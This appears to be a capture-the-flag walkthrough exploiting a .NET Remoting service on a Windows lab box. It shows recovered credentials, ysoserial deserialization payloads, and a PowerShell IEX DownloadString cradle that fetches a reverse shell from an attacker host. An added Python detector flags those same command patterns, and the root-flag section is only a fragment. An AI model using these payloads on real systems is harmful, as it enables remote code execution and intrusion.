System Summary
Initial Enumeration
An Nmap scan reveals some classic Windows services open.
Enum4linux doesn't show anything valuable.
Port 8888 looks interesting, but when we connect to it, it does not seem to reply.
More precisely: when we send it some input it does not return readable text, but tcpdump shows that it replies with an authentication failure.
It seems that there is a .NET client-server application running on it.
It's time to analyze the Kanban application on a Windows machine.
We will need a Windows machine with Visual Studio to proceed.
Opening the executable portablekanban.exe with ILSpy, we can look into the code.
We find that it stores the users and their encrypted passwords in the portablekanban.pk3 file.
Looking deeper, we see that it uses the default crypto in .NET (= DES encryption), and we can also find the Initialization Vector (IV): XuVUm5fR
Opening the file PortableKanban.pk3 we see the encrypted passwords for user lars and administrator:
- Administrator: G2@$btRSHJYTarg
- Lars: G123HHrth234rRG
We now have access to the share \\10.10.10.219\dev, which contains a couple of executables and a DLL.
Opening server.exe with ILSpy, we see that it listens on port 8888 (so it's the service we discovered with nmap) and that it uses the .NET Remoting library.
This library is used to execute remote operations on a server: a client connects and makes remote calls to procedures.
Opening client.exe, we see some juicy information:
- Endpoint URL: tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint
- Username: debug
- Password: SharpApplicationDebugUserPassword123!
Looking on the Internet, we can find a very interesting C# project from James Forshaw that can be used to send malicious content to a server that uses the .NET Remoting library.
This project is named ExploitRemotingService and can easily be found on GitHub.
We have to download it and compile it with Visual Studio (Community edition is fine).
We will now have an executable named ExploitRemotingServices.exe that connects to the remote service and sends a specially crafted payload (which we still have to build).
User Flag
The next step is to create a proof-of-concept payload, such as a ping request.
We can use ysoserial, a well-known tool for creating payloads:
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c " ping 10.10.14.10"
It will output a long base64 string.
We have to copy/paste the payload and pass it to ExploitRemotingServices.exe.
At the same time we can monitor the network with Wireshark.
The command line is:
ExploitRemotingServices.exe -s --rev=4 --password="SharpApplicationDebugUserPassword123!" --user=debug tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw <ysoserial payload>
We receive ICMP requests from the sharp box: this means that our payload was executed.
The next step is to change the payload from a ping to a reverse shell.
Here we need to choose a good reverse shell. After some effort we can grab a good PowerShell reverse shell here: https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
We have to customize the first line with our IP address and port. We can also rename the file to rev.txt to avoid filters.
Once done, we have to start a local Python HTTP server to serve this rev.txt (the usual python http.server or SimpleHTTPServer listening on port 8000).
Then create the reverse shell payload with ysoserial:
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c " powershell IEX (New-object net.webclient).Downloadstring('http://10.10.14.10:8000/rev.txt')"
It will output a long base64 payload that we can copy.
Then we can start a netcat listener (right window) and run the exploit ExploitRemotingServices.exe again (on the left).
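The defender's view of the two command lines used above, as an added example that is not part of the original write-up: process-creation records are checked for the remoting service starting a shell and for the IEX/DownloadString pattern. The field names follow Sysmon Event ID 1; the file paths, the sample records and the rule names are constructed for illustration, and server.exe as the watched parent is an assumption taken from the share contents described earlier.

```python
import ntpath
import re

# Assumption: the remoting service runs as server.exe (name from the page).
WATCHED_PARENTS = {"server.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.\s*download(string|data|file)\s*\(", re.IGNORECASE)

def classify(event):
    """Return the names of the rules a process-creation record trips."""
    hits = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    # Rule 1: a service that only answers remoting calls should never start a shell.
    if parent in WATCHED_PARENTS and child in SHELLS:
        hits.append("service_spawned_shell")
    # Rule 2: download-and-execute in memory, whichever process started it.
    if IEX_RE.search(cmdline) and DOWNLOAD_RE.search(cmdline):
        hits.append("download_cradle")
    return hits

def scan(events):
    """Return (index, rules) for every record that trips at least one rule."""
    results = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((index, hits))
    return results

# Constructed records (hypothetical paths); command lines mirror the ones on this page.
CRADLE = ("powershell IEX (New-object net.webclient)"
          ".Downloadstring('http://10.10.14.10:8000/rev.txt')")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\example\server.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c  ping 10.10.14.10"},
    {"ParentImage": r"C:\example\server.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c  " + CRADLE},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": CRADLE},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-ChildItem"},
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(index, rules, SAMPLE_EVENTS[index]["CommandLine"])
```

The first rule catches the ping proof of concept as well, because it keys on the parent process rather than on the command text.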
Root Flag
- client.getdiskInfo();
- client.getCPUInfo();
- client.getRamInfo();